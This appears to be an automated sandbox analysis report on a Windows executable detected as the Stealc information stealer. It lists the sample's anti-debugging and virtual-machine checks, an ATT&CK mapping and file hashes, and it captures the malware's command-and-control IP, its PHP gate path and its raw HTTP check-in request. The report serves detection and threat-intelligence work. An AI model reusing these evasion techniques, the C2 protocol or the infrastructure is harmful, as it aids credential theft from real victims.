                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_006DED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_006DBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006DDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006D16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_006E3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006DF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D1160 GetSystemInfo,ExitProcess,0_2_006D1160
                Source: file.exe, file.exe, 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1823830492.0000000000E72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                Source: file.exe, 00000000.00000002.1823830492.0000000000E96000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1823830492.0000000000EA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1823830492.0000000000E2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1823830492.0000000000E2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwarev
                Source: file.exe, 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13631
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13628
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13647
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13643
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13683
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D45C0 VirtualProtect ?,00000004,00000100,000000000_2_006D45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_006E9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E9750 mov eax, dword ptr fs:[00000030h]0_2_006E9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_006E7850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6780, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_006E9600
                Source: file.exe, file.exe, 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ^Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_006E7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_006E6920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_006E7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_006E7A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.6d0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1823830492.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1781255600.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6780, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.6d0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1823830492.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1781255600.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6780, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.phpo17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phpw17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phpc17%VirustotalBrowse
                http://185.215.113.37/ws17%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37_file.exe, 00000000.00000002.1823830492.0000000000E2E000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phpot:jfile.exe, 00000000.00000002.1823830492.0000000000E88000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37file.exe, 00000000.00000002.1823830492.0000000000E2E000.00000004.00000020.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    • URL Reputation: malware
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.phpofile.exe, 00000000.00000002.1823830492.0000000000E72000.00000004.00000020.00020000.00000000.sdmptrueunknown
                    http://185.215.113.37/wsfile.exe, 00000000.00000002.1823830492.0000000000E88000.00000004.00000020.00020000.00000000.sdmptrueunknown
                    http://185.215.113.37/e2b1563c6670f193.phpWHjjfile.exe, 00000000.00000002.1823830492.0000000000E88000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/e2b1563c6670f193.phpcfile.exe, 00000000.00000002.1823830492.0000000000E72000.00000004.00000020.00020000.00000000.sdmptrueunknown
                      http://185.215.113.37/e2b1563c6670f193.phpwfile.exe, 00000000.00000002.1823830492.0000000000E72000.00000004.00000020.00020000.00000000.sdmptrueunknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      185.215.113.37
                      		unknownPortugal
                      		206894WHOLESALECONNECTIONSNLtrue

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1522427
                      Start date and time:2024-09-30 03:23:05 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 2m 59s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:1
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:file.exe
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 80%
                      • Number of executed functions: 19
                      • Number of non-executed functions: 91
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Stop behavior analysis, all processes terminated

                      Warnings

                      • Report size getting too big, too many NtQueryValueKey calls found.

                      Simulations

                      Behavior and APIs

                      No simulations

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      185.215.113.37file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousAmadey, StealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php

                      Domains

                      No context

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousAmadey, StealcBrowse
                      • 185.215.113.103
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      No created / dropped files found

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.9493193257263925
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:file.exe
                      File size:1'872'384 bytes
                      MD5:dc92ce1751a7abfe2c6232ae8fcdd321
                      SHA1:dccd40639ea30f104ff1daf9d51f6f8e76efc2ed
                      SHA256:16302289d512b8fbc68c2ef8eb4d3bcebdc7f5bf353785390a14d4c5dfbee672
                      SHA512:4e810d9b0f7ee05e66c6fc96274c46595175012713981790660fe39aaae5837655a8c24629ef50b3e45112ed5a3bd8e1a4dbb02ab46d5e174a1f9b87291266a1
                      SSDEEP:49152:ERIK1zz0HB7M1Wi8F+bNs3AwEMA89qTXa9VN+uL:o3z0M1t8F4UAwEMRqTXKC0
                      TLSH:5585332AFEB3D33EC09E2DF9C7B727FA531446C880AAC2C58FDDA05D5420657399095A
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                      File Icon

                      Icon Hash:90cececece8e8eb0

                      Static PE Info

                      General

                      Entrypoint:0xaac000
                      Entrypoint Section:.taggant
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                      Entrypoint Preview

                      Instruction
                      jmp 00007F33B8DB4B4Ah
                      pshufw mm3, qword ptr [eax+eax], 00h
                      add byte ptr [eax], al
                      add cl, ch
                      add byte ptr [eax], ah
                      add byte ptr [eax], al
                      add byte ptr [eax+00h], ah
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      push es
                      add byte ptr [eax], 00000000h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      or ecx, dword ptr [edx]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      xor byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      xchg eax, ebx
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [ecx], cl
                      add byte ptr [eax], 00000000h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      push es
                      or al, byte ptr [eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], dl
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [ebx], al
                      or al, byte ptr [eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [edi], al
                      add byte ptr [eax], 00000000h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      pop es
                      or al, byte ptr [eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], dl
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [edx], al
                      or al, byte ptr [eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], cl
                      add byte ptr [eax], 00000000h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al

                      Rich Headers

                      Programming Language:
                      • [C++] VS2010 build 30319
                      • [ASM] VS2010 build 30319
                      • [ C ] VS2010 build 30319
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [LNK] VS2010 build 30319

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      0x10000x25b0000x2280004ea4886087ef979847b4aebbee1d22cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      0x25e0000x2aa0000x2008c5a0010c3d3c9fb274cf1c84e952ce2unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      mljpawsw0x5080000x1a30000x1a3000d7f965a6ea33d3be0e6a807ff748859fFalse0.9949790936381265data7.954150449631776IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      uqwudrny0x6ab0000x10000x40088748912fce70085855195e94e1a1b5aFalse0.7314453125data5.708639752428155IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .taggant0x6ac0000x30000x2200da7641287d3736a9a7554dbf4b77fc45False0.058363970588235295DOS executable (COM)0.6410084349610963IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                      Imports

                      DLLImport
                      kernel32.dlllstrcpy

                      Network Behavior

                      Suricata IDS Alerts

                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                      2024-09-30T03:24:10.566762+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.3780TCP

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Sep 30, 2024 03:24:09.580913067 CEST4973080192.168.2.4185.215.113.37
                      Sep 30, 2024 03:24:09.585872889 CEST8049730185.215.113.37192.168.2.4
                      Sep 30, 2024 03:24:09.585963011 CEST4973080192.168.2.4185.215.113.37
                      Sep 30, 2024 03:24:09.586106062 CEST4973080192.168.2.4185.215.113.37
                      Sep 30, 2024 03:24:09.590888977 CEST8049730185.215.113.37192.168.2.4
                      Sep 30, 2024 03:24:10.312869072 CEST8049730185.215.113.37192.168.2.4
                      Sep 30, 2024 03:24:10.312956095 CEST4973080192.168.2.4185.215.113.37
                      Sep 30, 2024 03:24:10.342576981 CEST4973080192.168.2.4185.215.113.37
                      Sep 30, 2024 03:24:10.347472906 CEST8049730185.215.113.37192.168.2.4
                      Sep 30, 2024 03:24:10.566664934 CEST8049730185.215.113.37192.168.2.4
                      Sep 30, 2024 03:24:10.566761971 CEST4973080192.168.2.4185.215.113.37
                      Sep 30, 2024 03:24:13.696296930 CEST4973080192.168.2.4185.215.113.37

                      HTTP Request Dependency Graph

                      • 185.215.113.37

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.449730185.215.113.37806780C:\Users\user\Desktop\file.exe
                      TimestampBytes transferredDirectionData
                      Sep 30, 2024 03:24:09.586106062 CEST89OUTGET / HTTP/1.1
                      Host: 185.215.113.37
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Sep 30, 2024 03:24:10.312869072 CEST203INHTTP/1.1 200 OK
                      Date: Mon, 30 Sep 2024 01:24:10 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Content-Length: 0
                      Keep-Alive: timeout=5, max=100
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                      Sep 30, 2024 03:24:10.342576981 CEST411OUTPOST /e2b1563c6670f193.php HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----AECAECFCAAEBFHIEHDGH
                      Host: 185.215.113.37
                      Content-Length: 210
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Data Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 36 38 30 30 37 41 34 34 41 42 42 38 38 33 38 38 34 31 37 39 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 2d 2d 0d 0a
                      Data Ascii: ------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="hwid"A68007A44ABB883884179------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="build"doma------AECAECFCAAEBFHIEHDGH--
                      Sep 30, 2024 03:24:10.566664934 CEST210INHTTP/1.1 200 OK
                      Date: Mon, 30 Sep 2024 01:24:10 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Content-Length: 8
                      Keep-Alive: timeout=5, max=99
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
